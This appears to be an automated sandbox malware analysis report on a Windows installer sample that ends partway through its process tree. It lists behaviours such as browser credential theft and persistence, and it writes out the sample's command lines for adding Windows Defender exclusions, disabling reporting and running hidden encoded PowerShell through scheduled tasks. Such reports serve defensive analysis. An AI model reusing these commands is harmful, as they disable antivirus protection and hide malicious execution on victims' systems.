Resubmissions

15-11-2024 18:05

241115-wpjcdsxrdy 10

11-11-2024 21:40

241111-1h6xbsxcql 10

03-12-2022 17:54

221203-wg4ncscc33 10

Analysis

  • max time kernel
    1722s
  • max time network
    1735s
  • platform
    windows10-ltsc 2021_x64
  • resource
    win10ltsc2021-20241023-en
  • resource tags

    arch:x64arch:x86image:win10ltsc2021-20241023-enlocale:en-usos:windows10-ltsc 2021-x64system
  • submitted
    15-11-2024 18:05

General

  • Target

    8eb41b097a51665e2a51b7d055260ea06b5224123450a147080de0a0ebcb4fff.exe

  • Size

    7.3MB

  • MD5

    83dbe0cb14f889e38fc0f8889842cf9d

  • SHA1

    ded313ca908136000fd9e5f623dcf0974e2b5f30

  • SHA256

    8eb41b097a51665e2a51b7d055260ea06b5224123450a147080de0a0ebcb4fff

  • SHA512

    ad4bef13d8b816dc81b42e0a2983cedd8c1b66bb15ffff93d908dd8bb78621c2ec690c44dc01bffb3a378159c42c7552ebd27bdb889eb13351a85a26d61fbac6

  • SSDEEP

    196608:91O0G+ffRqHIxpuBM9lsB1veokOefmev7+RND:3OL+ffRqoxpAQi0POcmez+LD

Malware Config

Signatures

  • Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

    Run Powershell and hide display window.

  • Checks BIOS information in registry 2 TTPs 2 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 2 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 4 IoCs
  • Indirect Command Execution 1 TTPs 2 IoCs

    Adversaries may abuse utilities that allow for command execution to bypass security restrictions that limit the use of command-line interpreters.

  • Loads dropped DLL 1 IoCs
  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Drops Chrome extension 1 IoCs
  • Drops desktop.ini file(s) 1 IoCs
  • Drops file in System32 directory 11 IoCs
  • Drops file in Program Files directory 13 IoCs
  • Drops file in Windows directory 5 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 64 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Enumerates system info in registry 2 TTPs 4 IoCs
  • Modifies data under HKEY_USERS 64 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 11 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 40 IoCs
  • Suspicious use of AdjustPrivilegeToken 4 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\8eb41b097a51665e2a51b7d055260ea06b5224123450a147080de0a0ebcb4fff.exe
    "C:\Users\Admin\AppData\Local\Temp\8eb41b097a51665e2a51b7d055260ea06b5224123450a147080de0a0ebcb4fff.exe"
    1⤵
    • System Location Discovery: System Language Discovery
    • Suspicious use of WriteProcessMemory
    PID:4584
    • C:\Users\Admin\AppData\Local\Temp\7zS9FF9.tmp\Install.exe
      .\Install.exe
      2⤵
      • Executes dropped EXE
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:5008
      • C:\Users\Admin\AppData\Local\Temp\7zSA22B.tmp\Install.exe
        .\Install.exe /S /site_id "525403"
        3⤵
        • Checks BIOS information in registry
        • Checks computer location settings
        • Executes dropped EXE
        • Drops file in System32 directory
        • System Location Discovery: System Language Discovery
        • Enumerates system info in registry
        • Suspicious use of WriteProcessMemory
        PID:4528
        • C:\Windows\SysWOW64\forfiles.exe
          "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"
          4⤵
          • Indirect Command Execution
          • System Location Discovery: System Language Discovery
          • Suspicious use of WriteProcessMemory
          PID:2564
          • C:\Windows\SysWOW64\cmd.exe
            /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&
            5⤵
            • System Location Discovery: System Language Discovery
            • Suspicious use of WriteProcessMemory
            PID:1144
            • \??\c:\windows\SysWOW64\reg.exe
              REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32
              6⤵
              • System Location Discovery: System Language Discovery
              PID:4644
            • \??\c:\windows\SysWOW64\reg.exe
              REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64
              6⤵
              • System Location Discovery: System Language Discovery
              PID:1348
        • C:\Windows\SysWOW64\forfiles.exe
          "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"
          4⤵
          • Indirect Command Execution
          • System Location Discovery: System Language Discovery
          • Suspicious use of WriteProcessMemory
          PID:4260
          • C:\Windows\SysWOW64\cmd.exe
            /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&
            5⤵
            • Suspicious use of WriteProcessMemory
            PID:3120
            • \??\c:\windows\SysWOW64\reg.exe
              REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32
              6⤵
                PID:548
              • \??\c:\windows\SysWOW64\reg.exe
                REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64
                6⤵
                • System Location Discovery: System Language Discovery
                PID:3316
          • C:\Windows\SysWOW64\schtasks.exe
            schtasks /CREATE /TN "gqNorCLFZ" /SC once /ST 07:26:43 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
            4⤵
            • System Location Discovery: System Language Discovery
            • Scheduled Task/Job: Scheduled Task
            PID:1328
          • C:\Windows\SysWOW64\schtasks.exe
            schtasks /run /I /tn "gqNorCLFZ"
            4⤵
              PID:2184
            • C:\Windows\SysWOW64\schtasks.exe
              schtasks /DELETE /F /TN "gqNorCLFZ"
              4⤵
                PID:2480
              • C:\Windows\SysWOW64\schtasks.exe
                schtasks /CREATE /TN "bKwcWZekAnYWEgmozo" /SC once /ST 18:24:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\EMPJhNxQCousXoKTu\mXQpfNlKnkevdXC\NPqtgBc.exe\" q8 /site_id 525403 /S" /V1 /F
                4⤵
                • Drops file in Windows directory
                • System Location Discovery: System Language Discovery
                • Scheduled Task/Job: Scheduled Task
                PID:3716
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE" -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
          1⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:3732
          • C:\Windows\system32\gpupdate.exe
            "C:\Windows\system32\gpupdate.exe" /force
            2⤵
              PID:4444
          • C:\Windows\system32\svchost.exe
            C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc
            1⤵
              PID:3592
            • C:\Windows\system32\svchost.exe
              C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum
              1⤵
              • Drops file in Windows directory
              PID:1092
            • C:\Windows\system32\gpscript.exe
              gpscript.exe /RefreshSystemParam
              1⤵
                PID:1920
              • C:\Users\Admin\AppData\Local\Temp\EMPJhNxQCousXoKTu\mXQpfNlKnkevdXC\NPqtgBc.exe
                "C:\Users\Admin\AppData\Local\Temp\EMPJhNxQCousXoKTu\mXQpfNlKnkevdXC\NPqtgBc.exe" q8 /site_id 525403 /S
                1⤵
                • Executes dropped EXE
                • Drops file in System32 directory
                • System Location Discovery: System Language Discovery
                • Suspicious use of WriteProcessMemory
                PID:396
                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                  powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;"
                  2⤵
                  • Drops file in System32 directory
                  • Modifies data under HKEY_USERS
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  • Suspicious use of WriteProcessMemory
                  PID:728
                  • C:\Windows\SysWOW64\cmd.exe
                    "C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
                    3⤵
                    • System Location Discovery: System Language Discovery
                    • Suspicious use of WriteProcessMemory
                    PID:4976
                    • C:\Windows\SysWOW64\reg.exe
                      REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
                      4⤵
                      • System Location Discovery: System Language Discovery
                      PID:2564
                  • C:\Windows\SysWOW64\reg.exe
                    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:64
                    3⤵
                    • System Location Discovery: System Language Discovery
                    PID:4300
                  • C:\Windows\SysWOW64\reg.exe
                    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:32
                    3⤵
                    • System Location Discovery: System Language Discovery
                    PID:1992
                  • C:\Windows\SysWOW64\reg.exe
                    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:64
                    3⤵
                    • System Location Discovery: System Language Discovery
                    PID:4852
                  • C:\Windows\SysWOW64\reg.exe
                    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:32
                    3⤵
                      PID:2012
                    • C:\Windows\SysWOW64\reg.exe
                      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:64
                      3⤵
                      • System Location Discovery: System Language Discovery
                      PID:2024
                    • C:\Windows\SysWOW64\reg.exe
                      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:32
                      3⤵
                        PID:3924
                      • C:\Windows\SysWOW64\reg.exe
                        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:64
                        3⤵
                        • System Location Discovery: System Language Discovery
                        PID:5000
                      • C:\Windows\SysWOW64\reg.exe
                        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:32
                        3⤵
                        • System Location Discovery: System Language Discovery
                        PID:3804
                      • C:\Windows\SysWOW64\reg.exe
                        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:64
                        3⤵
                        • System Location Discovery: System Language Discovery
                        PID:3620
                      • C:\Windows\SysWOW64\reg.exe
                        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:32
                        3⤵
                        • System Location Discovery: System Language Discovery
                        PID:2616
                      • C:\Windows\SysWOW64\reg.exe
                        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:64
                        3⤵
                          PID:4804
                        • C:\Windows\SysWOW64\reg.exe
                          "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:32
                          3⤵
                          • System Location Discovery: System Language Discovery
                          PID:948
                        • C:\Windows\SysWOW64\reg.exe
                          "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:64
                          3⤵
                          • System Location Discovery: System Language Discovery
                          PID:2260
                        • C:\Windows\SysWOW64\reg.exe
                          "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:32
                          3⤵
                          • System Location Discovery: System Language Discovery
                          PID:4692
                        • C:\Windows\SysWOW64\reg.exe
                          "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:64
                          3⤵
                          • System Location Discovery: System Language Discovery
                          PID:4844
                        • C:\Windows\SysWOW64\reg.exe
                          "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:32
                          3⤵
                          • System Location Discovery: System Language Discovery
                          PID:5012
                        • C:\Windows\SysWOW64\reg.exe
                          "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:64
                          3⤵
                          • System Location Discovery: System Language Discovery
                          PID:2124
                        • C:\Windows\SysWOW64\reg.exe
                          "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:32
                          3⤵
                            PID:3236
                          • C:\Windows\SysWOW64\reg.exe
                            "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:64
                            3⤵
                            • System Location Discovery: System Language Discovery
                            PID:3420
                          • C:\Windows\SysWOW64\reg.exe
                            "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:32
                            3⤵
                            • System Location Discovery: System Language Discovery
                            PID:2696
                          • C:\Windows\SysWOW64\reg.exe
                            "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:64
                            3⤵
                            • System Location Discovery: System Language Discovery
                            PID:1784
                          • C:\Windows\SysWOW64\reg.exe
                            "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:32
                            3⤵
                            • System Location Discovery: System Language Discovery
                            PID:1920
                          • C:\Windows\SysWOW64\reg.exe
                            "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:64
                            3⤵
                              PID:3792
                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                            powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\RqtPwFqMTiUn\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\RqtPwFqMTiUn\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\UBqYudvSNocU2\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\UBqYudvSNocU2\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\ZUXSmeDRU\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\ZUXSmeDRU\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\oXjeNNLqKAotC\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\oXjeNNLqKAotC\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\xonCRuklPFipnPeqKpR\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\xonCRuklPFipnPeqKpR\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\hrOORTLiECQfZJVB\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\hrOORTLiECQfZJVB\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\EMPJhNxQCousXoKTu\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\EMPJhNxQCousXoKTu\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\YSrBLfWUtIHnuviW\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\YSrBLfWUtIHnuviW\" /t REG_DWORD /d 0 /reg:64;"
                            2⤵
                            • Drops file in System32 directory
                            • System Location Discovery: System Language Discovery
                            • Modifies data under HKEY_USERS
                            • Suspicious behavior: EnumeratesProcesses
                            • Suspicious use of AdjustPrivilegeToken
                            PID:1128
                            • C:\Windows\SysWOW64\cmd.exe
                              "C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\RqtPwFqMTiUn" /t REG_DWORD /d 0 /reg:32
                              3⤵
                              • System Location Discovery: System Language Discovery
                              PID:3896
                              • C:\Windows\SysWOW64\reg.exe
                                REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\RqtPwFqMTiUn" /t REG_DWORD /d 0 /reg:32
                                4⤵
                                • System Location Discovery: System Language Discovery
                                PID:1552
                            • C:\Windows\SysWOW64\reg.exe
                              "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\RqtPwFqMTiUn" /t REG_DWORD /d 0 /reg:64
                              3⤵
                              • System Location Discovery: System Language Discovery
                              PID:2644
                            • C:\Windows\SysWOW64\reg.exe
                              "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\UBqYudvSNocU2" /t REG_DWORD /d 0 /reg:32
                              3⤵
                                PID:3304
                              • C:\Windows\SysWOW64\reg.exe
                                "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\UBqYudvSNocU2" /t REG_DWORD /d 0 /reg:64
                                3⤵
                                  PID:4592
                                • C:\Windows\SysWOW64\reg.exe
                                  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ZUXSmeDRU" /t REG_DWORD /d 0 /reg:32
                                  3⤵
                                  • System Location Discovery: System Language Discovery
                                  PID:4700
                                • C:\Windows\SysWOW64\reg.exe
                                  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ZUXSmeDRU" /t REG_DWORD /d 0 /reg:64
                                  3⤵
                                    PID:464
                                  • C:\Windows\SysWOW64\reg.exe
                                    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\oXjeNNLqKAotC" /t REG_DWORD /d 0 /reg:32
                                    3⤵
                                      PID:2412
                                    • C:\Windows\SysWOW64\reg.exe
                                      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\oXjeNNLqKAotC" /t REG_DWORD /d 0 /reg:64
                                      3⤵
                                      • System Location Discovery: System Language Discovery
                                      PID:3416
                                    • C:\Windows\SysWOW64\reg.exe
                                      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\xonCRuklPFipnPeqKpR" /t REG_DWORD /d 0 /reg:32
                                      3⤵
                                        PID:3328
                                      • C:\Windows\SysWOW64\reg.exe
                                        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\xonCRuklPFipnPeqKpR" /t REG_DWORD /d 0 /reg:64
                                        3⤵
                                        • System Location Discovery: System Language Discovery
                                        PID:2252
                                      • C:\Windows\SysWOW64\reg.exe
                                        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\hrOORTLiECQfZJVB /t REG_DWORD /d 0 /reg:32
                                        3⤵
                                        • System Location Discovery: System Language Discovery
                                        PID:3140
                                      • C:\Windows\SysWOW64\reg.exe
                                        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\hrOORTLiECQfZJVB /t REG_DWORD /d 0 /reg:64
                                        3⤵
                                        • System Location Discovery: System Language Discovery
                                        PID:2288
                                      • C:\Windows\SysWOW64\reg.exe
                                        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\EMPJhNxQCousXoKTu /t REG_DWORD /d 0 /reg:32
                                        3⤵
                                        • System Location Discovery: System Language Discovery
                                        PID:1440
                                      • C:\Windows\SysWOW64\reg.exe
